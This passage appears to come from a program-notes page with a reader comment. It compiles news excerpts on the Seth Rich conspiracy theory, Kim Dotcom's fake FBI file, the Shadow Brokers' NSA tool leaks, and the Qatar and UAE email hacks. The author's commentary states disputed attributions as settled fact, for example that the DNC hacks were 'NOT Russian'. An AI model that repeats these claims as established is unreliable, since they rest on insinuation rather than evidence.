On Tuesday, Fox News added its own revelation: It claimed that an unnamed “federal investigator” had confirmed that Rich had been in contact with WikiLeaks. “I have seen and read the emails between Seth Rich and Wikileaks,” the source said, according to Fox News. Fox News additionally claimed this source had evidence that Rich had given thousands of DNC emails to WikiLeaks.

This was a two-source story: The report also said that Wheeler had independently corroborated what the anonymous “federal investigator” had told Fox News.

But here’s where it gets confusing. By Tuesday afternoon, Wheeler told CNN that he had misspoken. It turns out he didn’t have any evidence of his own.

What had happened, apparently, was that earlier in the week, Fox News had contacted Wheeler for its own story on Rich. That was when Wheeler learned that Fox News had a source alleging there was contact between Rich and WikiLeaks. When Wheeler went on local TV on Monday night to talk about Rich, he believed he was giving viewers a “preview” of the Fox News story set to run on Tuesday.

That, at least, is how Wheeler explained the situation to CNN last Tuesday. Somehow, through miscommunication or sloppy reporting, the Fox News report used Wheeler to back up its claims about the Rich-WikiLeaks connection. This was incorrect, Wheeler said. He had no independent knowledge.

“I only got that [information] from the reporter at Fox News,” he told CNN.

Yesterday, after leaving it up for a week, Fox News finally retracted its Seth Rich story, which was down to one anonymous source. “The article was not initially subjected to the high degree of editorial scrutiny we require for all our reporting,” an editor’s note explained. “Upon appropriate review, the article was found not to meet those standards and has since been removed.”

Conservative media has a field day

It’s unlikely that any of this would have been a big deal had there not been a stunning series of damaging reports about Donald Trump last week.

Among other things, it was revealed that Trump had shared state secrets with the Russians, that he had pressured FBI Director James Comey to drop his investigation into ties between Trump affiliates and Russia, and that the Russia probe had reached a current high-level White House official, who many suspect is Trump’s son-in-law, Jared Kushner.

One way the conservative media minimized all the bad news was to focus on other stories. The latest Seth Rich allegations became a welcome distraction from the constant revelations coming out of the Washington Post and the New York Times.

For instance, while most outlets were covering the revelation that Trump had volunteered classified information to Russians, the alt-right website Breitbart devoted its front page to the Seth Rich conspiracy. Breitbart even slammed the mainstream media for ignoring the rumors about Rich: “Silence from Establishment Media over Seth Rich WikiLeaks Report” was the title of one story.

Fox News in particular devoted outsize attention to the Rich story, repeatedly rehashing the conspiracy theory. On his 10 pm show, Fox pundit Sean Hannity devoted segments to Rich on Tuesday, Thursday, and Friday last week. “I’m not backing off asking questions even though there is an effort that nobody talk about Seth Rich,” he said on Friday night.

On Tuesday, even after Fox News retracted the story that ignited the latest round of speculation, Hannity remained convinced that the Seth Rich conspiracy theory had legs. “I am not Fox.com or FoxNews.com,” he said on his radio show. “I retracted nothing.”

Later that evening, on his television show, Hannity said that for now, he would stop talking about Rich “out of respect for the family’s wishes.” On Twitter, though, he was defiant, claiming that “liberal fascism” was trying to silence his voice.

“Ok TO BE CLEAR, I am closer to the TRUTH than ever,” he tweeted. “Not only am I not stopping, I am working harder.”

“Please retweet,” he added.

Rich was an unlucky victim of the conservative media

The recent attention has reignited the old Seth Rich conspiracy theories, bringing forth even more unsubstantiated claims.

On Fox News’s Sunday morning talk show, Newt Gingrich repeated his belief that Rich, not Russia, was responsible for the DNC hack. “It turns out, it wasn’t the Russians,” he said. “It was this young guy who, I suspect, was disgusted by the corruption of the Democratic National Committee.”

On Monday, Assange issued a cryptic tweet using the hashtag “#SethRich” which fanned the flames even further: “WikiLeaks has never disclosed a source. Sources sometimes talk to other parties but identities never emerge from WikiLeaks. #SethRich.”

And on Tuesday, New Zealand file-sharing entrepreneur Kim Dotcom, who is wanted by the US government for copyright infringement and racketeering, claimed that Rich had personally contacted him in 2014, and that the two had talked about “a number of topics including corruption and the influence of corporate money in politics.”

“I know that Seth Rich was involved in the DNC leak,” Dotcom wrote in a statement. . . .

Kim Dotcom manifesting the lifestyle of the politically and economically oppressed.

Kim Dotcom manifesting the lifestyle of the politically and economically oppressed.

7. Kim Dotcom just tweeted out a document that’s allegedly from the FBI demonstrating that Seth Rich was indeed the source of the hacked DNC emails. The twist is that the document is a blatant fraud and Kim Dotcom acknowledges as much. Ol’ Kim decided to tweet it out anyway, Dotcom’s asserting that there’s no need to delete the tweet promoting the fake document because, hey, he put up some subsequent tweets questioning their authenticity. Twist & spin.

However, there was another rather intriguing admission by Dotcom in the following interview asking him why he tweeted out documents he knew were fake: Dotcom is continuing to assert that he has evidence Rich was the source of the DNC hacks.

He’s just not ready to reveal it yet but he strongly hints that the evidence has to do with his close ties to Wikileaks. And then he refers back to a Bloomberg TV interview he did on May 13th, 2015, where Dotcom predicts that Julian Assange is going to be Hillary Clinton’s “worst nightmare” in the upcoming election. How so? Because, says Dotcom, Assange “has access to information,” without going into specifics.

Of fundamental importance to out understanding is the assertion by Craig Murray, former UK ambassador to Uzbekistan, that the information given to WikiLeaks wasn’t a hack at all, but information from a flash drive given to him by a DNC insider.

There may well have been hacks into the DNC and e-mail of John D. Podesta, but they were NOT Russian.

Dotcom refers to a May 2015 interview – long before Seth Rich would have been in a position to pass along emails. It is before Rich would have had a motive if he really was a disillusioned Bernie-crat but shortly before Crowdstrike “concluded” the DNC was initially hacked – where Dotcom confidently asserts that Julian Assange already had a bunch of dirt on Hillary and was going to be her worst nightmare. And yet we didn’t really see any old embarrassing emails emerge from Wikileaks during the campaign. Along with being incredibly sleazy it’s all rather curious:

“Kim Dotcom Says FBI File About Seth Rich Is Fake, But He Won’t Delete It From Twitter” by Matt Novak; Gizmodo; 5/20/2017

Have you seen that FBI file, purporting to be about the death of DNC staffer Seth Rich? Kim Dotcom, who thrust himself into the story recently by telling Sean Hannity that he had evidence Rich had sent documents to Wikileaks, published the document on Twitter, helping to spread it online. Dotcom now acknowledges that the document is fake. But he told Gizmodo that he’s not going to delete it.

The fake FBI document was first published on a website called Borderland Alternative Media and it wasn’t long before it started to spread on social media, including by Kim Dotcom. Alex Jones’ Prison Planet picked it up, but has since deleted its own version of the story.

The internet’s interest in the July 2016 murder of Seth Rich revolves around claims that he leaked Democratic Party documents to Wikileaks, an idea that Julian Assange has hinted at repeatedly. The police say that Seth Rich’s murder was a robbery gone bad. But internet conspiracy theorists believe that Rich was killed as retribution for leaking emails about the DNC. Whatever the case, the FBI file is complete bullshit.

“I was skeptical. I tweeted that the document could be a fake and that the FBI has to weigh in about it,” Dotcom told me over direct message on Twitter.

The document is obviously fake to anyone who’s looked at real FBI files. For one thing, the FBI doesn’t use black to redact information, it uses white boxes. And much more damningly, the redactions include partial words and partial dates, as well as the partial redaction of its classification stamp, things that would never be done.

[see pics of hoax FBI documents]

You can see the comparison between the fake FBI file on Seth Rich (above left) with a recently obtained FBI file on military historian Robert Dorr (above right). It’s a sloppy fake.

“After doing some forensic analysis of the document I came to believe it is not authentic. And I have retweeted Wikileaks which came to the same conclusion,” Dotcom told me.

But as any Twitter user knows, tweets with incorrect information spread much faster than corrections. So I asked Dotcom why he didn’t delete the tweets with the fake FBI file.

“There is no need to delete those tweets because I have been very cautious and warned within an hour of the release of that document that it could be a fake,” Dotcom told me.

That all seemed reasonable, if misguided, to me. But then I asked Dotcom for evidence of his claims that he knows Rich was involved in the DNC leak. During our back and forth on Twitter DM, Dotcom sent me a message saying that he knew I wasn’t going to write a balanced piece, and insinuated that he simply knows because of his close ties to Wikileaks.

I just had a look at your twitter feed and it looks like your are very much anti-trump. And that’s ok. I already know that your story wont be balanced. But this is not a Trump issue. Seth was a Sanders supporter. The progressives should ask what really happened to Seth. He’s one of yours. And they should be interested that the matters I have raised are properly investigated.

Please have a look at my Bloomberg interview in which I announced long before the election that Julian is going to be a problem for Clinton. My relations to Wikileaks are well known. I have said many times in the past that I have been a major donor and Julian has been a guest at my moment of Truth event.

How do you think I knew?

The Bloomberg interview Dotcom is referring to is from May 13, 2015, wherein he said that Assange would be “Clinton’s worst nightmare.” At this point, Clinton had just announced her candidacy a month earlier and Donald Trump hadn’t even entered the race yet.

Interviewer: You’re saying Julian Assange is going to be Hillary’s worst nightmare?

Dotcom: I think so, yeah.

Interviewer: How so?

Dotcom: Well, he has access to information.

Interviewer: What information?

Dotcom: I don’t know the specifics.

Interviewer: Why Hillary in particular?

Dotcom: Hillary hates Julian. She’s just an adversary, I think, of internet freedom.

Interviewer: And she signed your extradition request.

Dotcom: Yeah.

Interviewer: So, you have a bone to pick with her.

Dotcom: You know what the craziest thing is? I actually like Hillary. I like Obama. So it’s so crazy that all of this happened.

During the course of our conversation over Twitter DM, Dotcom pointed me to numerous links online, but none of them answered my basic question: How do you know that Seth Rich was involved in the DNC leak?

One of the links Dotcom sent me contained his open letter to the family of Seth Rich, who have asked Dotcom to stop spreading conspiracy theories about the murder of their son.

In that letter, Dotcom says “I simply wish to make sure that the investigators have the benefit of my evidence.” Again, I asked Dotcom for that evidence and he said that he would only show such things to the Rich family, at the advice of his lawyers and “out of respect for the Rich family.”

But Dotcom’s most recent public comment on the matter, a letter posted today directed to the FBI Special Counsel who are investigating the Trump regime’s ties to Russia, makes it look like Dotcom’s interest in the Seth Rich case may not be altogether altruistic.

Dotcom is originally from Germany but moved to New Zealand from Hong Kong in 2009, and is currently wanted in the United States for running the file hosting and sharing site Megaupload, which was accused of systematically violating copyright. His extradition to the US has been blocked repeatedly and he’s been in a state of legal limbo for years.

But Dotcom’s new letter to the FBI Special Counsel says that he’d be willing to share his evidence that Seth Rich was involved in leaking information to Wikileaks provided he’s given safe passage to the US:

Mr Dotcom is also committed to achieving an outcome where his evidence can be properly received and reviewed by you as part of the Investigation. You will, however, appreciate that, given his current status, he is not in a position to voluntarily leave New Zealand’s jurisdiction. Further, he is concerned that, should he travel to the United States voluntarily, he would be arrested and detained in custody on the current counts on which he has been indicted.

The letter goes on to say that after “special arrangements” have been made, he’ll be glad to travel to the US to give his evidence. One imagines that those special arrangements would involve dropping the case against him.

Accordingly, for Mr Dotcom to attend in person in the United States to make a statement, and/or give oral evidence at any subsequent hearing, special arrangements would need to be discussed and agreed between all relevant parties. Such arrangements would need to include arrangements for his safe passage from New Zealand and return. This is because Mr Dotcom is determined to clear his name in New Zealand.

So make of that what you will. Kim Dotcom clearly has reason to be angry at the US Justice Department, but if he really had evidence proving that a man was murdered for political reasons, it seems a bit shady to use it as a bargaining chip for your own freedom. It seems unlikely that the FBI would grant Dotcom’s request, so if he really does have any information on the Seth Rich case, we may never get to see it.

But given the fact that there’s virtually no evidence outside of the wildest conspiracy theory boards that Seth Rich was killed by anyone connected to the Clinton campaign, I wouldn’t hold my breath anyway.

8. The Shadow Brokers, released some more NSA hacking tools, along with a list of IP addresses the NSA was targeting. All of this was apparently in response to a sense of betrayal. Betrayal by Donald Trump. Yes, when Donald Trump launched a cruise missile attack against Syria this so upset The Shadow Brokers that they wrote another long broken English rant (with a white nationalist theme) about Trump living up to his promises and then released some more hacking tools.

We analyzed the ShadowBrokers in FTR #923.

Suffice it to say, that this group is, in all probability, not Russian at all.

“Mysterious Group Posts More Alleged NSA Hacking Tools; Russia Link Suspected” by Tim Johnson; McClatchy DC; 4/10/2017.

In the latest in a drumbeat of intelligence leaks, a hacking group known as the Shadow Brokers has released another set of tools it said were designed by the top-secret National Security Agency to penetrate computer systems worldwide.

In a rant-filled statement over the weekend, Shadow Brokers also released a list of servers it said the tools had infected.

One document appeared to show that NSA spyware had been placed on servers in South Korea, Russia, Japan, China, Mexico, Taiwan, Spain, Venezuela and Thailand, among other countries. The dump included details of how the NSA purportedly had gained access to Pakistan’s main mobile network.

The release marked the most recent in a steady stream of disclosures of purported hacking tools developed by the NSA and the CIA. Shadow Brokers made a similar release in August, and in March the anti-secrecy group WikiLeaks released several batches of files that purported to show how the CIA spies on its targets. WikiLeaks has dubbed those leaks Vault7.

Cybersecurity experts differed in their assessment of the leaked material but several agreed that it would give global foes crucial information about American hacking abilities and plans.

In its statement, Shadow Brokers said the latest leak, following one eight months ago, “is our form of protest” to goad President Donald Trump into staying loyal to his followers and promoting anti-globalism. The screed included profanity, some white supremacist commentary and a password to the cache of tools. . . .

8. CrowdStrike–at the epicenter of the supposed Russian hacking controversy is noteworthy. Its co-founder and chief technology officer, Dmitry Alperovitch is a senior fellow at the Atlantic Council, financed by elements that are at the foundation of fanning the flames of the New Cold War.

 “Is Skepticism Treason?” by James Carden; The Nation; 1/3/2017.

. . . In this respect, it is worth noting that one of the commercial cybersecurity companies the government has relied on is Crowdstrike, which was one of the companies initially brought in by the DNC to investigate the alleged hacks. . . . Dmitri Alperovitch is also a senior fellow at the Atlantic Council. . . . The connection between [Crowdstrike co-founder and chief technology officer Dmitri] Alperovitch and the Atlantic Council has gone largely unremarked upon, but it is relevant given that the Atlantic Council—which is is funded in part by the US State Department, NATO, the governments of Latvia and Lithuania, the Ukrainian World Congress, and the Ukrainian oligarch Victor Pinchuk—has been among the loudest voices calling for a new Cold War with Russia. As I pointed out in the pages of The Nation in November, the Atlantic Council has spent the past several years producing some of the most virulent specimens of the new Cold War propaganda. . . . 

9. Next, the program highlights a topic that was initially broached in the last program. The OUN/B milieu in the U.S. has apparently been instrumental in generating the “Russia did it” disinformation about the high-profile hacks. A Ukrainian activist named Alexandra Chalupa has been instrumental in distributing this disinformation to Hillary Clinton and influencing the progress of the disinformation in the media. 

“The Anonymous Blacklist Quoted by the Washington Post Has Apparent Ties to Ukrainian Fascism and CIA Spying” by Mark Ames; Alternet.org; 12/7/2016.

. . . . One of the key media sources [46] who blamed the DNC hacks on Russia, ramping up fears of crypto-Putinist infiltration, is a Ukrainian-American lobbyist working for the DNC. She is Alexandra Chalupa—described as the head of the Democratic National Committee’s opposition research on Russia and on Trump, and founder and president of the Ukrainian lobby group ‘US United With Ukraine Coalition’ [47], which lobbied hard to pass a 2014 bill increasing loans and military aid to Ukraine, imposing sanctions on Russians, and tightly aligning US and Ukraine geostrategic interests. . . . In one leaked DNC email [50] earlier this year, Chalupa boasts to DNC Communications Director Luis Miranda that she brought Isikoff to a US-government sponsored Washington event featuring 68 Ukrainian journalists, where Chalupa was invited ‘to speak specifically about Paul Manafort.’ In turn, Isikoff named her as the key inside source [46] ‘proving’ that the Russians were behind the hacks, and that Trump’s campaign was under the spell of Kremlin spies and sorcerers. . . .

 

 

 

 

 

 

Discussion

13 comments for “FTR #960 Update on the High Profile Hacks”

  1. Now that Donald Trump appears to be intent on living up to the phrase “it’s not the crime, it’s the coverup” regarding the investigation into possible Russian collusion, hopefully one of the outcomes of the shift of Trump’s culpability from “did he collude with the Russians?” to “did he obstruct justice in to the investigation into his collusion with the Russian?” will be a willingness to ask the other obvious question, “did the Trump campaign carry out the hack attacks and make it look like the Russian, regardless of whether or not there was any other collusion?” Because, you know, it seems like pulling off such a stunt and propelling US/Russian relations to a new low and threatening to spark future conflicts in order to cover up a campaign crime would be an incredibly big deal. As big a deal, if not bigger, than outright collusion given the destructive capability of a Russian conflict and the obvious potential for such disastrous results that could result from such an operation. Wouldn’t that be treason too?

    So, in the spirit of hoping the latter question gets asked, here’s the latest reminder that cyber-attribution is far more nebulous than most US coverage of this issue would like to admit: you know the now-infamous Qatari news article that trashed Trump, praised Iran, and ended up triggering a severing of relations with Qatar’s Sunni neighbors? And you know how the FBI has already said that Russian hackers did it? Well, there was a second big hack that rattled Middle East governments just a few days later. A hack of the emails of the UAE’s influential ambassador to the US, Yousef Al Otaiba. A hack that appears to be a kind of counter-point to the Qatari hack and intended to create difficulties between the US and UAE and reveal an ongoing UAE campaign to encourage the US to move its massive airbase out of the Qatar (presumably to a nearby place like the UAE). And as the attribution to that hack unfolds, it’s looking like a now-familiar story: Russian hackers did it hackers that could have been anyone did it…hackers who decided to use a “.ru” email address to disseminate their hacked material.

    First, here’s an overview of the al Otaiba hack which is mostly a peek behind the US/UAE diplomatic curtain:

    The Huffington Post

    Someone Is Using These Leaked Emails To Embarrass Washington’s Most Powerful Ambassador
    HuffPost confirmed eight inflammatory D.C. insider email exchanges, including between Yousef Al Otaiba and former Defense Secretary Robert Gates.

    By Akbar Shahid Ahmed
    06/03/2017 10:01 am ET | Updated

    WASHINGTON – A mysterious source contacted multiple news outlets this week to share emails between the influential ambassador of the United Arab Emirates, Yousef Al Otaiba, and top figures in the American foreign policy community, including former Defense Secretary Robert Gates.

    In private correspondence, Otaiba – an extremely powerful figure in Washington, D.C., who is reportedly in “in almost constant phone and email contact” with Jared Kushner, President Donald Trump’s adviser and son-in-lawis seen pushing for the U.S. to close down its military base in Qatar and otherwise poking at issues that could drive a wedge between the U.S. and that Arab nation. He also says that his country’s de facto ruler is supportive of a wave of anti-Qatar criticism in the U.S. that the Gulf state last month called a smear campaign and that has prompted behind-the-scenes alarm inside the U.S. government.

    The anonymous leakers told HuffPost they sought to expose the UAE’s efforts to manipulate the U.S. government, and denied any allegiance to Qatar or any other government.

    Regardless of the leakers’ intent, the revelations promise to heighten tensions between the two U.S. partners. If the UAE succeeds in damaging America’s decades-old relationship with Qatar, the result could dramatically undermine U.S. goals in the Middle East. The two American partners’ escalating rivalry could worsen conflict in war zones where they support different proxy forces – notably in Libya, which has become a haven for smugglers, warlords, and terrorists – while distracting attention from bigger international priorities, like restoring stability in Syria and Iraq after the expected battlefield defeat of the Islamic State. And the UAE strategy could leave the U.S. more wedded to that government’s whims, including its policy of maintaining brittle autocratic rule across the region instead of trying to secure long-term stability by having some level of popular participation.

    The UAE and Qatar have taken their rivalry public in recent days following a controversial report in Qatari media. Qatari authorities soon claimed that the May 23 story – which suggested that the country’s ruler, Sheikh Tamim bin Hamad Al Thani, gave a speech describing his respect for Iran, his support for the Palestinian militant group Hamas and his ties with Israel – was a fake product of a hack. But news sources based in the UAE and Saudi Arabia still suggest that it exposed his true feelings.

    Though Qatar and the Emirates are putative allies, they have drifted apart since 2011 because of their differing reactions to the Arab Spring protests that year. As the largely non-violent Muslim Brotherhood movement gained power across the region, Qatar supported it, seeing it as a vehicle for the Middle East’s democratic aspirations. The UAE calls the group a terror front. With a new U.S. administration in power, the time is ripe for one or the other to push for American action in its own interests.

    Otaiba, who has been the UAE’s ambassador to the United States since 2008, is known as one of the best-connected diplomats in Washington, D.C. He makes frequent high-profile appearances around the city and the U.S. speaking circuit, and he’s ensured that the Trump administration has already cozied up to the Emirates, which hosts a recently opened Trump golf course.

    The leakers provided HuffPost with three batches of emails from Otaiba, some as recent as May and others from as far back as 2014, the last time the UAE supported a major effort to spread skepticism about Qatar in the United States. HuffPost contacted eight of the individuals who’d exchanged messages with the ambassador and shared the contents of those emails; none denied that the exchanges took place. Though Otaiba did not respond to repeated HuffPost requests for comment, a UAE Embassy spokeswoman confirmed to the Daily Beast that the Hotmail address used for the messages belongs to him.

    Otaiba’s emails show an effort to build alliances and a focus on Qatar.

    The night before former U.S. Defense Secretary Robert Gates was scheduled to speak at a high-profile Washington conference on Qatar, for instance, Otaiba wrote him an artfully worded note. “The subject of the conference has been a neglected issue in U.S. foreign policy despite all the trouble it’s causing,” the diplomat wrote. “Coming from you, folks will listen carefully.”

    Gates emailed back that he thought he had “the chance to put some folks on notice.”

    Otaiba offered to buy the former Cabinet official lunch and passed along a message from his boss back home. “MBZ sends his best from Abu Dhabi,” the ambassador wrote, using a nickname for UAE Crown Prince Muhammed bin Zayed. “He says ‘give them hell tomorrow.’”

    The next day, Gates offered a scathing assault on Qatar, excoriating its support for Islamists, at an event hosted by the hawkish Foundation for Defense of Democracies. “The United States military doesn’t have any irreplaceable facility,” he said. “Tell Qatar to choose sides or we will change the nature of the relationship, to include downscaling the base.”

    The incident worried U.S. officials. The American ambassador to Qatar, experienced career diplomat Dana Shell Smith, contacted many of the conference speakers beforehand to try to tone down the rhetoric. It appears that her attempt backfired: foundation officials have publicly criticized and questioned her efforts.

    The powerful Washington-based foundation features heavily in the Otaiba emails. While many of those messages show the ambassador helping its analysts plan trips to the UAE, they also contain two of the most striking revelations about Otaiba: He explicitly advocated for moving the U.S. base out of Qatar – something he hasn’t done publicly – and he discussed the idea of pressuring companies in U.S.-friendly countries to avoid business opportunities in Iran.

    An Arab’s Favorite Pro-Israel Group

    The Foundation for Defense of Democracies spends much of its time trying to strengthen ties between Washington and conservative political forces in Israel. But despite the UAE’s refusal to establish diplomatic ties with Israel, the think tank and others in the pro-Israel lobby have found common ground with the Emirates on two major issues: Both want to contain Iran and political Islam. Both suffered a high-profile defeat when the U.S. and other nations reached a nuclear deal with Iran in 2015. And for the past year or so, both have been pushing to make the future of U.S. relations with Qatar a debate in D.C.

    Emirati critiques of Qatar often raise the same points the foundation’s scholars bring up in their frequent appearances before Congress and in the media: The Qatari government provides, in the words of the U.S. Treasury Department, a “permissive jurisdiction” for fundraisers and donors hoping to aid violent Muslim extremists. In supporting the rights of protesters and democracy activists (at least compared to its neighbors), Qatar is accused of promoting Islamists who claim to be peaceful but really seek to impose brutal Shariah law. And it frequently offers a platform to hatemongers targeting Israel, Jews, the minority Shiite community within Islam, LGBTQ individuals and others – generally on its marquee media property, the Arabic edition of Al-Jazeera.

    But experts on the region note that Qatar’s flaws as an American partner are not unique: Kuwait has also been called a “permissive jurisdiction,” and Saudi Arabia and the UAE also host terror financiers and clerics who spread hate speech. The vendetta against Qatar, then, appears to be driven by more defensive concerns, namely the pro-Israel side’s focus on Hamas and anyone who supports that group, and the UAE’s worry that the Muslim Brotherhood could threaten its own ruling regime.

    Otaiba made his views about the U.S. base in Qatar clear in an April 28 message this year to John Hannah, a senior counselor at the Foundation for Defense of Democracies and a former aide to Vice President Dick Cheney.

    Hannah had emailed the ambassador a Forbes article noting that an Emirati-owned hotel would actually be hosting a Hamas conference in “Muslim Brotherhood-loving” Qatar. Otaiba appeared taken aback by the jab; the UAE is rarely criticized in Washington’s policy community.

    “Shouldn’t we be trying to move the base?” he wrote. “I don’t think it’s fair to point the finger at an Emirati company on this one.”

    Hannah responded by saying he agreed about the military base. But he said criticism of the decision to host Hamas was fair no matter who owned the hotel. Otaiba snapped back that the UAE would move its hotel when the U.S. moved its base.

    “Don’t move the hotel,” Hannah answered. “Just force Hamas to reschedule at a different venue not owned by Emiratis.”

    On Friday, Hannah told HuffPost that the communications were business as usual.

    “As a leading Washington think tank, [the foundation] is engaged in policy discussions with a range of actors across the Middle East and elsewhere. My own relationship with Ambassador Otaiba goes back years, including both my time in government and out,” he wrote in an email.

    Although the broader foreign policy conversation is only now noting the alignment of interests between pro-Israel hawks and anti-Iran, anti-Brotherhood forces in the Gulf, like the UAE, informed analysts have recognized it for years.

    In a Feb. 5, 2014, email to Otaiba, lobbyist and former Clinton aide Rich Mintz directs him to note comments by former Obama administration official Dennis Ross at a public think tank event.

    Ross, a former senior adviser to President Barack Obama, is well respected among Middle East policy-makers. In a summary prepared by Mintz’s lobbying firm, Ross appeared to say that “as opposed to a few years ago, the talking points in the Gulf were almost identical to the ones he heard in speaking to Israeli officials.”

    (Mintz did not respond to a HuffPost request for comment; HuffPost was not able to independently confirm that exchange.)

    In recent weeks, Ross has publicly joined the chorus of Qatar critics and Emirates boosters. “The Qataris should know we have alternatives and are prepared to develop them in the UAE and elsewhere unless Qatar is prepared to be a genuine partner and not a party that contributes to the very threats we need to counter,” he wrote in USA Today on May 8.

    ———-

    “Someone Is Using These Leaked Emails To Embarrass Washington’s Most Powerful Ambassador” by Akbar Shahid Ahmed; The Huffington Post; 06/03/2017

    “In private correspondence, Otaiba – an extremely powerful figure in Washington, D.C., who is reportedly in “in almost constant phone and email contact” with Jared Kushner, President Donald Trump’s adviser and son-in-law – is seen pushing for the U.S. to close down its military base in Qatar and otherwise poking at issues that could drive a wedge between the U.S. and that Arab nation. He also says that his country’s de facto ruler is supportive of a wave of anti-Qatar criticism in the U.S. that the Gulf state last month called a smear campaign and that has prompted behind-the-scenes alarm inside the U.S. government.”

    And all these Otabia emails were released just days after the Qatari hack by someone claiming to not work for the Qataris but who merely wants to expose UAE/US lobbying efforts:


    The anonymous leakers told HuffPost they sought to expose the UAE’s efforts to manipulate the U.S. government, and denied any allegiance to Qatar or any other government.

    So was this a Qatari counter-hack? Some other actor who would like to add to the diplomatic tension in the region? At this point we don’t know.

    And as the article below notes, a group going around distributing these hacked emails calls itself “GlobalLeaks” and uses a .ru email. Which would suggests these were Russian hackers…if you take everything at face value. But as a group of cybersecurity researchers who have analyzed the Otaiba hack point out, anyone could have done it and just tried to make it look like Russian hackers (it’s not like .ru email addresses can’t be obtained by non-Russians). And while these researchers can’t attribute the hack to any government or group with precision, they do note that it looks like the methods used by what appears to be a mercenary hacker group that’s been operating in the region. A group that’s been hired by a number of Gulf states to hack other Gulf officials:

    The New York Times

    Hacking in Qatar Highlights a Shift Toward Espionage-for-Hire

    By DAVID D. KIRKPATRICK and SHEERA FRENKEL
    June 8, 2017

    DOHA, Qatar — The report appeared just after midnight on the official Qatari news agency’s website, and its contents were stunning: The emir of Qatar was quoted as describing “tensions” with President Trump and speculating he may not last in office, recommending friendship with Iran, praising the Palestinian militants of Hamas, and then attesting to his own “good” relations with Israel.

    The contradictory statements could hardly have been better contrived to alienate the United States and Arab countries around the Gulf, and Qatar immediately began to deny the report, early on May 24. But within 20 minutes, satellite networks controlled by Saudi Arabia and the United Arab Emirates had seized on the damning news flash and began interviewing long lines of well-prepared commentators to expound on the perfidy of Qatar.

    The Qatari government said the news agency had been hacked, a claim now supported by the F.B.I. and British law enforcement officials. Though they would not say so publicly, Qatari officials blamed the Saudis and Emiratis.

    Probably not coincidentally, a few days later, emails hacked from the Emirates’ ambassador to Washington began turning up in the Western news media and then the Qatari news network Al Jazeera.

    The cyber-intrigue was the opening skirmish in a pitched battle among ostensible Gulf allies this week. Saudi Arabia and the U.A.E. rallied dependent Arab states to cut off diplomatic relations, travel and trade with Qatar, and the unity of the American-backed alliance against the Islamic State and Iran has been fractured.

    But the dirty tricks also heralded a broader transformation in international espionage. The dust-up in the Gulf is the clearest sign yet that cyberattacks coupled with disinformation campaigns are no longer the exclusive domain of sophisticated powers like Russia. Any country can get in the game for the relatively low price of a few freelance hackers.

    The F.B.I. and other experts concluded the hack of Qatar’s news agency was the result of a computer break-in, and was most likely carried out by Russian hackers for hire, according to American and Qatari officials briefed on the investigation. F.B.I. officials told The New York Times that Russian mercenary hackers have frequently come up in investigations of attacks sponsored by nation-states.

    In fact, the hacking war in the Gulf region has likely been going on for years, though it has never played out on such a public stage. In 2015, for example, an Arab intermediary with ties to Qatar provided The Times with internal emails from the Emirati Foreign Ministry which stated that the U.A.E. was knowingly violating a United Nations resolution by shipping weapons to Libyan militias.

    “The fact of the matter is that the U.A.E. violated the U.N. Security Council Resolution on Libya and continues to do so,” Ahmed al-Qasimi, a senior Emirati diplomat, wrote in an internal email that was dated Aug. 4, 2015, and provided to The Times. Other internal Emirati emails about Libyan dealings and North Korean arms deals surfaced through Qatari-linked websites and the Guardian newspaper.

    Qatar has, at times, backed its own Libyan client militias on the other side of a three-year proxy war against the U.A.E — with both sides confounding Western attempts to broker a unity government in Libya.

    In a report scheduled to be released on Friday, two independent cybersecurity researchers claim that at least one group of hackers can be found working as freelancers for a number of Gulf states, and that their methods bear a striking resemblance to the methods used to hack the Emirati ambassador.

    “They seem to be hackers-for-hire, freelancing for all sorts of different clients, and adapting their skills as needed,” said Collin Anderson, who is one of the researchers. Mr. Anderson and his partner, Claudio Guarnieri, have nicknamed the group Bahamut, after a monstrous fish floating in the Arabian Sea in the Jorge Luis Borges novel “Book of Imaginary Beings.”

    The group regularly uses spear phishing attacks — emails designed to look innocent but contain malicious software applications. While it is not yet clear if Bahamut was behind the hack of the ambassador’s email, the group targeted a number of Emirati diplomats as well as other public figures in the Gulf region.

    Other news organizations have reported receiving leaked Emirati emails from a group calling itself GlobalLeaks and using email addressing ending in .ru, suggesting the mercenary hackers may be Russians or wish to pose as Russian.

    The Emirati ambassador, Yousef al-Otaiba, is well known for his assiduous efforts to convince American think tanks and government officials that Qatar had threatened the stability of the region by cheering the Arab uprisings of 2011 and, in particular, by backing the Muslim Brotherhood.

    Mr. Otaiba, a charismatic figure who speaks nearly native-sounding English, has also served as a personal tutor in regional politics to Jared Kushner, the son-in-law and a senior adviser to President Trump.

    Several of the newly leaked emails appear to include examples of Mr. Otaiba pressing anti-Qatari arguments with American officials, who banter with him like old friends.

    In fact, on Thursday, the government of Qatar listed the hacking attack as part of a broader public influence campaign that has been appearing in American newspapers and think tank conferences. A timeline the government distributed to reporters, identified a series of 14 op-ed articles that appeared across the American media in a sudden flurry beginning around the same time — late April — all singling out Qatar for supporting Islamist militants or extremists.

    President Trump arrived in the region on May 20, weeks after the barrage of criticism began, for an Arab summit in Saudi Arabia. “He told us exactly: ‘We have to work together in stopping the funding of extremist groups in the region and whenever I read reports about this region I read about Qatar and Saudi,’ ” the Qatari foreign minister, Sheikh Mohammed bin Abdulrahman Al Thani, recalled on Thursday.

    “Mr. President,” the foreign minister said he replied, “are the reports based on media reports or intelligence reports? If it is based on media reports, then this is something we cannot answer.”

    “We assured them that we have strong cooperation with our security agencies,” the foreign minister added.

    Then, three days after the Trump meeting in Riyadh, the Foundation for the Defense of Democracies held a conference in Washington dedicated to criticism of Qatar, titled “Qatar and the Muslim Brotherhood’s Global Affiliates.”

    Robert M. Gates, the former defense secretary and a friend of Mr. Otaiba, gave the keynote. Attendees included many of the authors of the critical op-ed articles and senior Obama administration officials. Organizers encouraged Mr. Otaiba to attend, and his staff sent Abu Dhabi, the Emirati capital, a detailed report.

    No representative of Qatar was invited. The hack of the Qatari news agency took place after midnight that night.

    Mr. Anderson, the cyber security researcher, said the low cost and relative ease of hiring hackers meant that more such attacks would surely follow.

    “This is the future for what countries all around the world can do,” he said, “if they have the money and the resources.”

    By Thursday night, Qatar’s Al Jazeera network reported that hackers were attempting to overload and crash its internet servers.

    ———–

    “Hacking in Qatar Highlights a Shift Toward Espionage-for-Hire” by DAVID D. KIRKPATRICK and SHEERA FRENKEL; The New York Times; 06/08/2017

    “In a report scheduled to be released on Friday, two independent cybersecurity researchers claim that at least one group of hackers can be found working as freelancers for a number of Gulf states, and that their methods bear a striking resemblance to the methods used to hack the Emirati ambassador.”

